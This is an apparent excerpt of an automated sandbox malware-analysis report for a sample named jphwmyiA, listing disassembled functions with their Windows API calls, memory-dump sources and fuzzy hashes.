Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 0000000C.00000002.3410702228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.3410702228.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3410702228.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 2A3FDD81 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2A3FDE0E
GetCurrentThread.KERNEL32 ref: 2A3FDE4B
GetCurrentProcess.KERNEL32 ref: 2A3FDE88
GetCurrentThreadId.KERNEL32 ref: 2A3FDEE1

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 02ed131d97c7126dc526a370d2e72e1413d15a4bef91d67c2c94b22ca53f23ad
Instruction ID: e63ae2a2d7121b47c6ecca3ee75bd37da5fb8ab3e84d4db5a823e2d3217d4bac
Opcode Fuzzy Hash: 02ed131d97c7126dc526a370d2e72e1413d15a4bef91d67c2c94b22ca53f23ad
Instruction Fuzzy Hash: A25188B09013498FDB18DFA9D588BEEBFF1EF59314F208459E049A7250C738A884CF65

Function 2A3FDD90 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2A3FDE0E
GetCurrentThread.KERNEL32 ref: 2A3FDE4B
GetCurrentProcess.KERNEL32 ref: 2A3FDE88
GetCurrentThreadId.KERNEL32 ref: 2A3FDEE1

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7930f3e88008c65bdd1514598bd7e81297d588c177f22f0cae68345f20f66fc6
Instruction ID: 3f48768a12b9f92acad2e180eb0c8fb9378cad8079e5709521eca5bc071a4f62
Opcode Fuzzy Hash: 7930f3e88008c65bdd1514598bd7e81297d588c177f22f0cae68345f20f66fc6
Instruction Fuzzy Hash: 7E5158B0D013498FDB08DFAAD588B9EBBF5EF58314F208459E409A7350D738A844CF65

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 0000000C.00000002.3410702228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.3410702228.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3410702228.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 2A29D9B0 Relevance: 2.7, Strings: 2, Instructions: 237COMMON

Download Yara Rule

Strings

LR]q, xrefs: 2A29D9CC
LR]q, xrefs: 2A29DAF9

Memory Dump Source

Source File: 0000000C.00000002.3455587633.000000002A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a290000_jphwmyiA.jbxd

Similarity

API ID:
String ID: LR]q$LR]q
API String ID: 0-3917262905
Opcode ID: 2c110666cd9810b8b4b14f4511d28c1c443233be788cdaac4858a32b146a82d5
Instruction ID: 702522f61ecbf95f3db63668a9dc8447970a6f9fad4fd411fd1102772dd51a2e
Opcode Fuzzy Hash: 2c110666cd9810b8b4b14f4511d28c1c443233be788cdaac4858a32b146a82d5
Instruction Fuzzy Hash: BD81A3347102069FDB08EF79C95495E7BF6FF89A04B2585A9E106DB361EB34EC02CB91

Function 2A1E7520 Relevance: 2.7, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

(aq, xrefs: 2A1E76FA
(&]q, xrefs: 2A1E763B

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID: (&]q$(aq
API String ID: 0-1602648543
Opcode ID: 1ec3225432786cc56473ec86ce23fd1b471e64b09ce3f329c11b0e8446804928
Instruction ID: b2b642d1f727015e01abc7bf30a2571de21170c8e2260f46adc7c4f70480a0cb
Opcode Fuzzy Hash: 1ec3225432786cc56473ec86ce23fd1b471e64b09ce3f329c11b0e8446804928
Instruction Fuzzy Hash: 6371D531F006198BDB09EFB9D8506EEBBB2AF98710F118429D505B7385DF34AE42C791

Function 2A3FB234 Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2A3FB401

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 788731df37d05f3208e54a7fdacee5a599e8af6b4b2e6b0b8613abd8541001d4
Instruction ID: 3322df87be492404451ee127f65b403058ee3f133abf3cec46677fc1ee17bb66
Opcode Fuzzy Hash: 788731df37d05f3208e54a7fdacee5a599e8af6b4b2e6b0b8613abd8541001d4
Instruction Fuzzy Hash: 3F718CB4D00258DFDF21CFA9D984ADDBBF1BF09300F1091AAE958A7211D734A985CF45

Function 2A3FB240 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2A3FB401

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b5cf635afa715b244d02fbb7720975ba75f7324a46107847382d909c41b97b83
Instruction ID: f4745d0d61c2cbe353964a74066a22ef102224a9922de5e7f955728a405981e2
Opcode Fuzzy Hash: b5cf635afa715b244d02fbb7720975ba75f7324a46107847382d909c41b97b83
Instruction Fuzzy Hash: 92716AB4D00218DFDF20CFA9D984ADDBBF1BF09304F5091AAE958A7211D734AA85CF55

Function 2A1DB43C Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a30d02f2ed9fbe798dfc670842303241d6f1e3b3daaf2f317d67cd4c242467af
Instruction ID: c42e4107845dcceaa108d5ae991a53b923e5feaf99e8ec3ba1a2149fe63de3c1
Opcode Fuzzy Hash: a30d02f2ed9fbe798dfc670842303241d6f1e3b3daaf2f317d67cd4c242467af
Instruction Fuzzy Hash: 37417D75908508EFCB10DF98C4D0ADDBBB1FF58324F619158D50AAB2A1C735AA82DF54

Function 2A3FDFD3 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2A3FE0A3

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5cb55e429c65e300993076319491c7cc56ab2c92621fc2048981072299b468d5
Instruction ID: f3f8c57019e9872fe719d64ed9d078b4c6e0185ecd659b0619c6725255a56762
Opcode Fuzzy Hash: 5cb55e429c65e300993076319491c7cc56ab2c92621fc2048981072299b468d5
Instruction Fuzzy Hash: 724156B9D002589FCB10CFAAD584ADEFBF5BB09310F24946AE918AB310D735A985CF54

Function 2A3FDFD8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2A3FE0A3

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: de9aeb37c8add9b1e6707eac2f24298eac4d6a8af0d1370e881ea5e360eaab65
Instruction ID: 37690062fd5bc581a15313b23004a286de37453a907cd3c24385f418b43b9127
Opcode Fuzzy Hash: de9aeb37c8add9b1e6707eac2f24298eac4d6a8af0d1370e881ea5e360eaab65
Instruction Fuzzy Hash: 7A4168B9D002589FCB10DFAAD584ADEFBF5BB09310F14946AE918BB310D335A945CF54

Function 2A1DB3DC Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c94b47dcb5fb5bda594d979e70153e4c088afefacfbf60ebe1f0728534c624
Instruction ID: e355e86cdbe50e04905da0351e8d239db3634736020e33795fa7a271a6bff5e1
Opcode Fuzzy Hash: 25c94b47dcb5fb5bda594d979e70153e4c088afefacfbf60ebe1f0728534c624
Instruction Fuzzy Hash: 8F417C75D08608EFCB10DF98D0C4ADDBBB2FF58324F619158D50AAB2A1C735AA82CF54

Function 2A1DB2A0 Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2A1DB2F1

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cdfdcb2d279f0fb2e85e30dd34fa82a58ac0baab1f3ed52767055d8949db551d
Instruction ID: da2f8ce79e98721f099176992eabdd7fbbc65938e6b3aac059e614b792c4390c
Opcode Fuzzy Hash: cdfdcb2d279f0fb2e85e30dd34fa82a58ac0baab1f3ed52767055d8949db551d
Instruction Fuzzy Hash: 0F417771904608EBCB04DF99C484ADDFBF2FF88314F25D168D5096B295C731AA86CF94

Function 2A3FE4A4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 2A3FF351

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a5c7fea7b1dcaba4c27fbe389d95c07afb3699eaa440ddd7658b6cf93bbbc625
Instruction ID: a7976b08550497f6909be98ac3b303e8871a826ff5db7dac64187415be05c088
Opcode Fuzzy Hash: a5c7fea7b1dcaba4c27fbe389d95c07afb3699eaa440ddd7658b6cf93bbbc625
Instruction Fuzzy Hash: 0B4108B59103059FCB14DF99C484A9AFBF5FF88314F24C85AE919A7321D338A841CFA0

Function 2600EE60 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 2600EF04

Memory Dump Source

Source File: 0000000C.00000002.3443915543.0000000026000000.00000040.00000800.00020000.00000000.sdmp, Offset: 26000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26000000_jphwmyiA.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 506a050bdbb7ad7e8882960dd108edd599e361ed701096b83e438c2502c68289
Instruction ID: 0ca9a33e99cd7ec0fd35c5c6fa338703a25e2caa71d9ec5399db0d6e22bed19a
Opcode Fuzzy Hash: 506a050bdbb7ad7e8882960dd108edd599e361ed701096b83e438c2502c68289
Instruction Fuzzy Hash: 343198B4D012489FDB14CFA9D980AAEFBF5BF49310F10942AE818B7210D735A945CF94

Function 2A3F8C70 Relevance: 1.6, APIs: 1, Instructions: 88timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(00000000,?,?,00000000), ref: 2A3FF5CB

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: daa7c24a9e93e2196ac04c66ea433c444fdb8f7c9ef70d9d1a0d1c823bb2227b
Instruction ID: 8b75701e0cb9fe1e531affc58874bfdc5875ab7a471209d7895ddd69d5f12a44
Opcode Fuzzy Hash: daa7c24a9e93e2196ac04c66ea433c444fdb8f7c9ef70d9d1a0d1c823bb2227b
Instruction Fuzzy Hash: 803188B9D05258AFCB10DFA9D584ADEFBF5AB09310F10942AE818B7310D375A945CFA4

Function 2A3FF528 Relevance: 1.6, APIs: 1, Instructions: 87timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(00000000,?,?,00000000), ref: 2A3FF5CB

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 7bbc8b30e233fb121321649a8d96639a576eaf5343e26fdeaa6cf08fb81bf78c
Instruction ID: 21f4769c8ae79b091bec68d55f992276156221cd44fa581ef4fba5049847de31
Opcode Fuzzy Hash: 7bbc8b30e233fb121321649a8d96639a576eaf5343e26fdeaa6cf08fb81bf78c
Instruction Fuzzy Hash: 323188B9D002489FCB10CFA9D584ADEFBF1BB09310F24941AE818B7310D335A945CF64

Function 2A3FA5D8 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 2A3FA672

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a7220231458e90b7ec8807d5dc71437fbbbef38cf0ea36f279bb3674dc99c109
Instruction ID: 5172dc60b4719914e37b2d2d0310f824fdeac8f7697f095c34480de9e5f3c481
Opcode Fuzzy Hash: a7220231458e90b7ec8807d5dc71437fbbbef38cf0ea36f279bb3674dc99c109
Instruction Fuzzy Hash: 6D31ABB4D102489FCB14CFAAD984ADEFBF5AF49310F14946AE858B7320D734A945CF64

Function 2A3F8FB4 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 2A3FA672

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 742347e8334225dd688f094b8bcfb8dc0d8252fb23afa2ca1537b48c54bcb053
Instruction ID: 6964060a03dff33f93631b288d927226a421313fdfe418ebc91ba12b684c1017
Opcode Fuzzy Hash: 742347e8334225dd688f094b8bcfb8dc0d8252fb23afa2ca1537b48c54bcb053
Instruction Fuzzy Hash: 9231ADB4D002489FCB14DFA9D584ADEFBF5AF49310F14946AE918B7320D334A945CFA4

Function 2AD3AD24 Relevance: 1.6, APIs: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 2AD3D0B3

Memory Dump Source

Source File: 0000000C.00000002.3456975474.000000002AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ad30000_jphwmyiA.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: cbe828620dee7d3a655b4d48ec902099999e1caee76aba5de7e573e715ff5cfc
Instruction ID: 41ae61d36bef4242ef4687b9359b951a215b7aaf8f7cab8d85203a624dd252d5
Opcode Fuzzy Hash: cbe828620dee7d3a655b4d48ec902099999e1caee76aba5de7e573e715ff5cfc
Instruction Fuzzy Hash: 4031CCB4D04208DFCB10DFA9D584ADEFBF4AB49320F14946AE848B7310D335A941CFA5

Function 2AD3D030 Relevance: 1.6, APIs: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 2AD3D0B3

Memory Dump Source

Source File: 0000000C.00000002.3456975474.000000002AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ad30000_jphwmyiA.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: e02b362a6b34813de37aa4860f250c41a653de327b119e33fac5a7d9174dcd54
Instruction ID: 9b6960e80e178c64746a1992269175b191e7634874894cdc691315b38a8c1105
Opcode Fuzzy Hash: e02b362a6b34813de37aa4860f250c41a653de327b119e33fac5a7d9174dcd54
Instruction Fuzzy Hash: DA31ACB8D002499FCB14CFA9D584ADEFBF5AF49324F24905AE818B7310D335A941CFA5

Function 2A1DB290 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2A1DB2F1

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e7b1674cf81efc3d7284397948d59718963501a764b2e37fdffd70d86f47bf2
Instruction ID: c625471195350382a546e5f9b0ef3893ad317fec0b1a7b6726d9a324eaca5c5a
Opcode Fuzzy Hash: 1e7b1674cf81efc3d7284397948d59718963501a764b2e37fdffd70d86f47bf2
Instruction Fuzzy Hash: F1218CB2D05508AFDB14EFAAD8887DDFBF6BF88320F14D129D105676A4C7305A46CB54

Function 2A1D7E0C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 2A1D7F4E

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5c552c280e76785ad0726da3ff42fda82d1bf03143764a63330c19013a2e31e
Instruction ID: ca9772e25a98e4810607412a228f57f80cb46b9c733c3da879373b838a1c7f2b
Opcode Fuzzy Hash: e5c552c280e76785ad0726da3ff42fda82d1bf03143764a63330c19013a2e31e
Instruction Fuzzy Hash: 05119D75E00119DFDB14EBA8D484EEDBBB5BF88318F108564E814A7252D730EA41CB60

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 0000000C.00000002.3410702228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.3410702228.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3410702228.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 0000000C.00000002.3410702228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.3410702228.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3410702228.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 2A29C470 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

+&, xrefs: 2A29C527

Memory Dump Source

Source File: 0000000C.00000002.3455587633.000000002A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a290000_jphwmyiA.jbxd

Similarity

API ID:
String ID: +&
API String ID: 0-3386231891
Opcode ID: cd1918b94b5b28dab50ae70da2f796192a269741f2e46d09d98f8f1224361ea8
Instruction ID: cab3d36ad7c1c1ae60a67ba1d7494d09f911eef0103a6c56730ea9c23f7fd78b
Opcode Fuzzy Hash: cd1918b94b5b28dab50ae70da2f796192a269741f2e46d09d98f8f1224361ea8
Instruction Fuzzy Hash: 4F71D275E00218CFDB08DFA5C994A9DBBB2BF89300F249029D804BB365DB396986CF54

Function 2A296440 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

+&, xrefs: 2A2964F7

Memory Dump Source

Source File: 0000000C.00000002.3455587633.000000002A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a290000_jphwmyiA.jbxd

Similarity

API ID:
String ID: +&
API String ID: 0-3386231891
Opcode ID: fd067b9578fffd5fd6509c93430aeaf43dd593b12290d31bfc0df078f9c8fa97
Instruction ID: aa63214161638c386fd72ab24f0973a746b2b5269c1bbce2c6d832ae271e3cfa
Opcode Fuzzy Hash: fd067b9578fffd5fd6509c93430aeaf43dd593b12290d31bfc0df078f9c8fa97
Instruction Fuzzy Hash: 2771D275E00218CFDB08DFA5C994ADDBBF2AF89300F248029D804BB365DB395986CF54

Function 2A1E8D18 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

nKuq, xrefs: 2A1E8DC6

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID: nKuq
API String ID: 0-4080595220
Opcode ID: 26bf1570d137c2a078000b8d5df5d022208085316f3d7d312ea8b28cc8c359e0
Instruction ID: 70b4670e8399d656ad1ec1176b0fac3f0406f4e0378340c755cabb8a9d0dee8b
Opcode Fuzzy Hash: 26bf1570d137c2a078000b8d5df5d022208085316f3d7d312ea8b28cc8c359e0
Instruction Fuzzy Hash: 3461D274E00259DFCB04DFA9D954AEEBBB2FF88300F10842AD909AB3A4DB355945CF50

Function 2A29C460 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

+&, xrefs: 2A29C527

Memory Dump Source

Source File: 0000000C.00000002.3455587633.000000002A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a290000_jphwmyiA.jbxd

Similarity

API ID:
String ID: +&
API String ID: 0-3386231891
Opcode ID: 25122ca1c8d8f1c9f4965a3fd466d7cd806edcc966c24127af36c62d79ad98b4
Instruction ID: 200cf8bd63fe567c0a7b7d2914e5e4222e8f845d83d0124b349e9f147ff0d058
Opcode Fuzzy Hash: 25122ca1c8d8f1c9f4965a3fd466d7cd806edcc966c24127af36c62d79ad98b4
Instruction Fuzzy Hash: 6431E271E012498FDB08EFAAC9546DDBBF2AF89304F249429D418BB255DB355A42CF50

Function 2600F130 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 2600F1AE

Memory Dump Source

Source File: 0000000C.00000002.3443915543.0000000026000000.00000040.00000800.00020000.00000000.sdmp, Offset: 26000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26000000_jphwmyiA.jbxd

Similarity

API ID: CloseHandle
String ID:
